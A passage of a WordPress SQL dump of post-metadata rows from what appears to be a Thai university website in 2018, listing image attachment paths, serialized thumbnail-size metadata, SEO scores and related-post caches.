(8903, 3983, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:58:\"2018/09/41836333_678154112560780_2475173181485219840_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41836333_678154112560780_2475173181485219840_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41836333_678154112560780_2475173181485219840_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41836333_678154112560780_2475173181485219840_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41836333_678154112560780_2475173181485219840_n-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8904, 3982, '_thumbnail_id', '3983'),
(8908, 3982, '_hide_featured', NULL),
(8909, 3982, '_yoast_wpseo_content_score', '30'),
(8910, 3982, '_yoast_wpseo_primary_category', '31'),
(8911, 3982, '_wpas_done_all', '1'),
(8912, 3985, '_edit_lock', '1537255953:3'),
(8913, 3985, '_edit_last', '3'),
(8914, 3986, '_wp_attached_file', '2018/09/42058456_679546969088161_4259799150297612288_o.jpg'),
(8915, 3986, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/09/42058456_679546969088161_4259799150297612288_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42058456_679546969088161_4259799150297612288_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42058456_679546969088161_4259799150297612288_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42058456_679546969088161_4259799150297612288_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42058456_679546969088161_4259799150297612288_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42058456_679546969088161_4259799150297612288_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8916, 3985, '_thumbnail_id', '3986'),
(8920, 3985, '_hide_featured', NULL),
(8921, 3985, '_yoast_wpseo_content_score', '30'),
(8922, 3985, '_yoast_wpseo_primary_category', '31'),
(8923, 3985, '_wpas_done_all', '1'),
(8926, 3988, '_edit_lock', '1537256343:3'),
(8927, 3988, '_edit_last', '3'),
(8928, 3989, '_wp_attached_file', '2018/09/18-9-2561-14-38-16.jpg'),
(8929, 3989, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:457;s:6:\"height\";i:567;s:4:\"file\";s:30:\"2018/09/18-9-2561-14-38-16.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-38-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-38-16-242x300.jpg\";s:5:\"width\";i:242;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-38-16-242x300.jpg\";s:5:\"width\";i:242;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8930, 3990, '_wp_attached_file', '2018/09/41961993_2201098220155278_2110555764002127872_o.jpg'),
(8931, 3990, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:59:\"2018/09/41961993_2201098220155278_2110555764002127872_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"41961993_2201098220155278_2110555764002127872_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"41961993_2201098220155278_2110555764002127872_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"41961993_2201098220155278_2110555764002127872_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"41961993_2201098220155278_2110555764002127872_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"41961993_2201098220155278_2110555764002127872_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8932, 3988, '_thumbnail_id', '3990'),
(8936, 3988, '_hide_featured', NULL),
(8937, 3988, '_yoast_wpseo_content_score', '30'),
(8938, 3988, '_yoast_wpseo_primary_category', '31'),
(8939, 3988, '_wpas_done_all', '1'),
(8940, 3982, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575705678;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6158;}i:1;a:1:{s:2:\"id\";i:5291;}i:2;a:1:{s:2:\"id\";i:6119;}}}}'),
(8941, 3961, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574984920;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:4017;}i:2;a:1:{s:2:\"id\";i:6150;}}}}'),
(8942, 3988, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575292080;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3954;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:6316;}}}}'),
(8943, 3965, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575724035;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5604;}i:1;a:1:{s:2:\"id\";i:3961;}i:2;a:1:{s:2:\"id\";i:4955;}}}}'),
(8944, 3968, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575739020;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4875;}i:1;a:1:{s:2:\"id\";i:5301;}i:2;a:1:{s:2:\"id\";i:6081;}}}}'),
(8945, 3979, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575303224;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5962;}i:1;a:1:{s:2:\"id\";i:5769;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(8946, 3971, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575276327;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3975;}i:1;a:1:{s:2:\"id\";i:5769;}i:2;a:1:{s:2:\"id\";i:3979;}}}}'),
(8947, 3985, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575663585;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5994;}i:1;a:1:{s:2:\"id\";i:5945;}i:2;a:1:{s:2:\"id\";i:6161;}}}}'),
(8948, 3993, '_edit_lock', '1537506423:3'),
(8949, 3993, '_edit_last', '3'),
(8950, 3994, '_wp_attached_file', '2018/09/42204822_680655475643977_5981505686469607424_o.jpg'),
(8951, 3994, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1776;s:6:\"height\";i:1184;s:4:\"file\";s:58:\"2018/09/42204822_680655475643977_5981505686469607424_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42204822_680655475643977_5981505686469607424_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42204822_680655475643977_5981505686469607424_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42204822_680655475643977_5981505686469607424_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42204822_680655475643977_5981505686469607424_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42204822_680655475643977_5981505686469607424_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8952, 3993, '_thumbnail_id', '3994'),
(8956, 3993, '_hide_featured', NULL),
(8957, 3993, '_yoast_wpseo_content_score', '30'),
(8958, 3993, '_yoast_wpseo_primary_category', '31'),
(8959, 3993, '_wpas_done_all', '1'),
(8960, 3993, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575392105;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3971;}i:1;a:1:{s:2:\"id\";i:4013;}i:2;a:1:{s:2:\"id\";i:5962;}}}}'),
(8961, 2243, '_yoast_wpseo_content_score', '60'),
(8962, 2169, '_yoast_wpseo_content_score', '90'),
(8963, 1033, '_yoast_wpseo_content_score', '90'),
(8964, 1189, '_yoast_wpseo_content_score', '90'),
(8965, 4006, '_edit_lock', '1538103682:3'),
(8966, 4006, '_edit_last', '3'),
(8971, 4006, '_hide_featured', NULL),
(8972, 4006, '_yoast_wpseo_content_score', '60'),
(8973, 4006, '_yoast_wpseo_primary_category', '3'),
(8974, 4006, '_wpas_done_all', '1'),
(8975, 4006, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575630460;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:5361;}}}}'),
(8976, 4010, '_edit_lock', '1538360045:3'),
(8977, 4010, '_edit_last', '3'),
(8978, 4011, '_wp_attached_file', '2018/10/42194262_681048368938021_8679997324597919744_o.jpg'),
(8979, 4011, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1599;s:6:\"height\";i:1023;s:4:\"file\";s:58:\"2018/10/42194262_681048368938021_8679997324597919744_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42194262_681048368938021_8679997324597919744_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42194262_681048368938021_8679997324597919744_o-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42194262_681048368938021_8679997324597919744_o-768x491.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:491;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42194262_681048368938021_8679997324597919744_o-1024x655.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:655;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42194262_681048368938021_8679997324597919744_o-400x256.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8980, 4010, '_thumbnail_id', '4011'),
(8984, 4010, '_hide_featured', NULL),
(8985, 4010, '_yoast_wpseo_content_score', '30'),
(8986, 4010, '_yoast_wpseo_primary_category', '31'),
(8987, 4010, '_wpas_done_all', '1'),
(8988, 4013, '_edit_lock', '1538360932:3'),
(8989, 4013, '_edit_last', '3'),
(8990, 4014, '_wp_attached_file', '2018/10/1-10-2561-9-20-33.jpg'),
(8991, 4014, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:464;s:6:\"height\";i:568;s:4:\"file\";s:29:\"2018/10/1-10-2561-9-20-33.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-10-2561-9-20-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"1-10-2561-9-20-33-245x300.jpg\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"1-10-2561-9-20-33-245x300.jpg\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8992, 4015, '_wp_attached_file', '2018/10/42266838_681066905602834_1853973279572754432_o.jpg'),
(8993, 4015, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/42266838_681066905602834_1853973279572754432_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42266838_681066905602834_1853973279572754432_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42266838_681066905602834_1853973279572754432_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42266838_681066905602834_1853973279572754432_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42266838_681066905602834_1853973279572754432_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42266838_681066905602834_1853973279572754432_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8994, 4013, '_thumbnail_id', '4015'),
(8998, 4013, '_hide_featured', NULL),
(8999, 4013, '_yoast_wpseo_content_score', '30'),
(9000, 4013, '_yoast_wpseo_primary_category', '31'),
(9001, 4013, '_wpas_done_all', '1'),
(9002, 4017, '_edit_lock', '1538363985:3'),
(9003, 4017, '_edit_last', '3'),
(9004, 4018, '_wp_attached_file', '2018/10/42412985_682515208791337_4285014993486741504_o.jpg'),
(9005, 4018, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/42412985_682515208791337_4285014993486741504_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42412985_682515208791337_4285014993486741504_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42412985_682515208791337_4285014993486741504_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42412985_682515208791337_4285014993486741504_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42412985_682515208791337_4285014993486741504_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42412985_682515208791337_4285014993486741504_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9006, 4017, '_thumbnail_id', '4018'),
(9010, 4017, '_hide_featured', NULL),
(9011, 4017, '_yoast_wpseo_content_score', '30'),
(9012, 4017, '_yoast_wpseo_primary_category', '31'),
(9013, 4017, '_wpas_done_all', '1'),
(9014, 4017, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575721688;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:5194;}}}}'),
(9015, 4020, '_edit_lock', '1538384431:3'),
(9016, 4020, '_edit_last', '3'),
(9017, 4021, '_wp_attached_file', '2018/10/201810011006.pdf'),
(9021, 4020, '_hide_featured', NULL),
(9022, 4020, '_yoast_wpseo_content_score', '60'),
(9023, 4020, '_yoast_wpseo_primary_category', '3'),
(9024, 4020, '_wpas_done_all', '1'),
(9025, 4020, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575697864;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4093;}i:1;a:1:{s:2:\"id\";i:5469;}i:2;a:1:{s:2:\"id\";i:4668;}}}}'),
(9026, 4013, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575743014;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:4163;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(9027, 4010, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575748102;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4875;}i:1;a:1:{s:2:\"id\";i:4632;}i:2;a:1:{s:2:\"id\";i:6145;}}}}'),
(9028, 4023, '_edit_lock', '1538448708:3'),
(9029, 4023, '_edit_last', '3'),
(9030, 4024, '_wp_attached_file', '2018/10/42478967_1977289398957921_5667713254110003200_n.jpg'),
(9031, 4024, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2018/10/42478967_1977289398957921_5667713254110003200_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"42478967_1977289398957921_5667713254110003200_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"42478967_1977289398957921_5667713254110003200_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"42478967_1977289398957921_5667713254110003200_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"42478967_1977289398957921_5667713254110003200_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9032, 4023, '_thumbnail_id', '4024'),
(9036, 4023, '_hide_featured', NULL),
(9037, 4023, '_yoast_wpseo_content_score', '30'),
(9038, 4023, '_yoast_wpseo_primary_category', '31'),
(9039, 4023, '_wpas_done_all', '1'),
(9040, 4026, '_edit_lock', '1538449173:3'),
(9041, 4026, '_edit_last', '3'),
(9042, 4027, '_wp_attached_file', '2018/10/42546550_682979115411613_5322076207641001984_o.jpg'),
(9043, 4027, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/42546550_682979115411613_5322076207641001984_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42546550_682979115411613_5322076207641001984_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42546550_682979115411613_5322076207641001984_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42546550_682979115411613_5322076207641001984_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42546550_682979115411613_5322076207641001984_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42546550_682979115411613_5322076207641001984_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9044, 4026, '_thumbnail_id', '4027'),
(9048, 4026, '_hide_featured', NULL),
(9049, 4026, '_yoast_wpseo_content_score', '30'),
(9050, 4026, '_yoast_wpseo_primary_category', '31'),
(9051, 4026, '_wpas_done_all', '1'),
(9052, 4029, '_edit_lock', '1538449314:3'),
(9053, 4029, '_edit_last', '3'),
(9054, 4030, '_wp_attached_file', '2018/10/42603570_682984702077721_378418989946109952_o.jpg'),
